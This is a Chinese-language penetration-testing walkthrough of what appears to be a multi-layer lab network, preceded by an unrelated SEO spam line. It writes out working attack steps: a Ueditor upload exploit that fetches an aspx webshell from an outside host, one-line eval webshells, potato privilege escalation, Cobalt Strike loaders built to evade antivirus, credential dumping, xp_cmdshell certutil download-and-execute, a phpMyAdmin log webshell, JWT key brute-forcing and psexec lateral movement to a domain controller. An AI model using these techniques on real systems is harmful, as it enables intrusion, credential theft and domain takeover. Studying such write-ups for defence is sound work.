东明网站建设推广,常用的网站开发语言有哪些,二级域名对网站帮助,小程序怎么开通六朝何事#xff0c;只成门户私计#xff01;
目录 环境配置
网络配置
本次实战绘制出来的网络拓扑图如下#xff1a; 第一层#xff1a;12server-web1
信息搜集
网站url#xff1a; 目录扫描 扫到后台地址#xff1a; 发现有注册功能#xff0c; 先注册一下尝试能…六朝何事只成门户私计
目录 环境配置
网络配置
本次实战绘制出来的网络拓扑图如下 第一层12server-web1
信息搜集
网站url 目录扫描 扫到后台地址 发现有注册功能 先注册一下尝试能不能登录 注册后成功登录 搜集到的信息
cms:HDHCMS
服务器名称12SERVER-WEB1
操作系统MicrosoftWindows NT 6.3.9600.0
中间件IIIS8.5
脚本语言aspx
物理路径C:\Hws.com\HwsHostMaster\wwwroot\www.xxx.com\web\admin\Hdhadmin.aspx
数据库MSSQL
上传目录upfiles/
富文本编辑器百度Ueditor1.4.3
边界突破
在后台发现的富文本编辑器百度Ueditor1.4.3 这个版本爆出过任意文件上传漏洞 可以直接拿shell 进行漏洞验证
访问网上公开的POC发现报错 很多情况下网站的二次开发会更改默认路径已经知道了是HDHCMS去查找其公开的源码通过源代码的审计 得到编辑器路径 之后进行漏洞利用 构造一个aspx的图片马
aspx一句话木马 然后图片马上传到公网服务器上 本地构造一个上传的form表单
form actionhttp://www.xxx.com/admin/net/controller.ashx?actioncatchimageenctypeapplication/x-www-form-urlencoded methodPOST
pshell addr:input typetext namesource[] //p
input typesubmit valueSubmit /
/form上传图片马上传地址修改为http://192.168.8.198/2.jpg?.aspx 成功上传该文件 访问木马地址 蚁剑连接 whoami查看权限发现是普通用户权限
ipconfig进行信息收集发现存在内网网段 查看进程tasklist 进行识别发现存在360全家桶和护卫神 哥斯拉提权
哥斯拉生成1.aspx的木马 生成的木马内容
% Page Language“Jscript”%%eval(Request.Item[“pass”],“unsafe”);% 成功连接 命令行执行whoami是普通用户权限 进入SweetPotato模块点击load点击run成功提权到system权限 cs拿shell
打开CS这是个服务器与客户端多对多架构的工具先开服务端
在Listeners面板中点击Add按钮新建一个监听器如图 生成Payload 这里使用Pakages生成一个Payload。在菜单栏中依次选择Attacks→Pakages→Payload Generator命令如图 保持默认配置选择已经创建的监听器设置输出类型为c注意勾选x64然后点击Generate按钮 如图 加壳免杀
使用 cobaltstrike分离免杀工具生成loader.exe文件 过360火绒静态查杀 通过蚁剑上传到C:/Hws.com/HwsHostMaster/wwwroot/www.xxx.com/web/upfiles/image/xxx/目录下 哥斯拉进行提权成功以system权限上线到cs 获取凭据
logonpasswords 获取凭据 查看凭据 破解凭据得到管理员的账号密码 远程登陆
查看防火墙需要administrator权限
shell netsh firewall show state
可以看到防火墙是关闭的 shell netstat -ano 可以看到没有开放3389端口 打开3389端口 shell netstat -ano 再次查看可以看到3389端口已开放 使用上面得到的管理员的账号密码进行登录 页面显示报错密码过期 通过搜寻资料了解到密码过期并不是真的过期可能是开启了仅允许运行使用网络级别身份验证的远程桌面的计算机连接
关闭仅允许运行使用网络级别身份验证的远程桌面的计算机连接
shell REG ADD “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d “0” /f 成功登录 第二层12server-data1
信息搜集
查看内网第二层网段存活的机器
arp -a 可以看到内网第二层网络还有一台192.168.59.129机器存活 线索发现
通过蚁剑和哥斯拉拿到的shell查看数据库的配置文件
绝对路径
C:/Hws.com/HwsHostMaster/wwwroot/www.xxx.com/web/HdhApp.config
从源代码中发现是站库分离的数据库服务器刚好是上面内网第二层网络的192.168.59.129机器 并且判断是1433端口MSSQL数据库的sa权限 add keyHdhCmsConnStr valueuser idsa;passwordpass123.com;initial catalogDemoHdhCms;data source 192.168.59.129/开代理连数据库 cs服务器的地址和端口 连接数据库 成功连接 开启xp_cmdshell
新建查询启用xp_cmdshell
EXEC sp_configure show advanced options,1;
RECONFIGURE;
EXEC sp_configure xp_cmdshell,1;
RECONFIGURE;EXEC sp_configure show advanced options,1;如下 尝试调用xp_cmdshell运行系统命令
EXEC master…xp_cmdshell ‘ipconfig’; 恢复删除xp_cmdshell
exec sp_addextendedproc xp_cmdshell,dllnamexplog70.dll
exec sp_dropextendedproc xplog70.dll关闭xp_cmdshell
EXEC sp_configure show advanced options,1;
RECONFIGURE;
EXEC sp_configure xp_cmdshell,0;
RECONFIGURE;上线cs
查看一下有无杀软tasklist 发现存在火绒 做一下火绒的免杀 尝试上线 使用windows的certutil命令远程下载文件
EXEC master..xp_cmdshell certutil -urlcache -split -f http://192.168.8.198/loader.exe C:\Windows\Temp\schost.exe;
EXEC master..xp_cmdshell C:\Windows\Temp\schost.exe;漏洞利用 成功上线cs 如果目标机器出网可以把木马放到自己的公网服务器上如果目标机器不出网只需把木马放到12server-web1上供其下载
权限提升
使用MS16-075Sweet Potato进行提权 漏洞利用 成功提权 获取凭据
logonpasswords 获取凭据 查看凭据 破解凭据得到管理员的账号密码
远程登陆
查看防火墙需要administrator权限
shell netsh firewall show state
可以看到防火墙是关闭的 shell netstat -ano 可以看到没有开放3389端口 打开3389端口 shell netstat -ano 再次查看可以看到3389端口已开放 挂上12server-web1的代理使用上面得到的管理员的账号密码进行登录 成功登录 第三层12server-web2
信息搜集
查看内网第三层网段存活的机器
arp -a 可以看到内网第二层网络还有一台192.168.22.130机器存活 开代理访问12server-web2
通过12server-data1开代理访问12server-web2 cs服务器的地址和端口 信息搜集
代理端口扫描 目录扫描 访问
http://192.168.22.130/a.php
目录扫描发现报错页面得知为phpstudy_pro 访问80端口的web服务
http://192.168.22.130/ JWT爆破
登录请求中 在token中发现jwt认证 jwt的特征就是前两段是base64编码去掉最后一段是秘钥然后点号拼接
爆破工具 jwt_toolgithub直接下载工具
git clone https://github.com/ticarpi/jwt_tool.git
爆破的命令
python3 jwt_tool.py xxx -C -d xxx.txt成功爆破出秘钥xxx is the CORRECT key! JWT加解密 admin用户签名后的jwt
首先对浏览器代理进行配置 其次对burp进行配置
和浏览器代理同一配置 和代理同一配置 抓取数据包修改X-token 以admin身份登陆进去之后发现后台什么都没有 phpmyadmin写日志拿shell
根据上面目录扫描的结果得出是phpstudypro本地搭建测试安装phpmyadmin找到默认路径phpmyadmin4.8.5
http://192.168.22.130/phpmyadmin4.8.5
root和jwt跑出的keyxxx 登陆 利用phpmyadmin日志
show variables like %general%;
SET GLOBAL general_logon; SHOW VARIABLES LIKE %general%;
SET GLOBAL general_log_fileC:/phpStudy_pro/www/shell.php;
SELECT ?php eval($_POST[cmd]);?写入一句话 蚁剑连接
地址http://192.168.22.130/shell.php
密码cmd ipconfig内网还有其他网段 whoami直接是administrator权限 上线cs
12server-data1设置中转监听 选择内网可以访问到的目标 生成木马通过蚁剑上传到12server-web2执行木马 JuicyPotato (ms16-075) 提权 获取凭据
logonpasswords 获取凭据 查看凭据 破解凭据得到本地管理员的账号密码
远程连接
挂代理远程连接 成功连接 第四层12server-data2
信息搜集
net view查看目标 发现内网还有一台12server-data2和一台16server-dc1
查看域管 查看域控详细信息 查看域用户 获取域控NTML psexec进行横向
有域控的明文密码并且域控是开放445端口的所以可以尝试psexec进行横向。
使用cs自带插件
首先设置smb监听 从目标出发 上线cs 第四层12server-dc1
psexec进行横向 上线cs 最终达到的效果如下 文笔生疏措辞浅薄望各位大佬不吝赐教万分感谢。
免责声明由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失均由使用者本人负责 文章作者不为此承担任何责任。
转载声明儒道易行 拥有对此文章的修改和解释权如欲转载或传播此文章必须保证此文章的完整性包括版权声明等全部内容。未经作者允许不得任意修改或者增减此文章的内容不得以任何方式将其用于商业目的。
CSDN:
https://blog.csdn.net/weixin_48899364?typeblog公众号
https://mp.weixin.qq.com/mp/appmsgalbum?__bizMzg5NTU2NjA1Mwactiongetalbumalbum_id1696286248027357190scene173from_msgid2247485408from_itemidx1count3nolastread1#wechat_redirect博客:
https://rdyx0.github.io/先知社区
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097FreeBuf
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
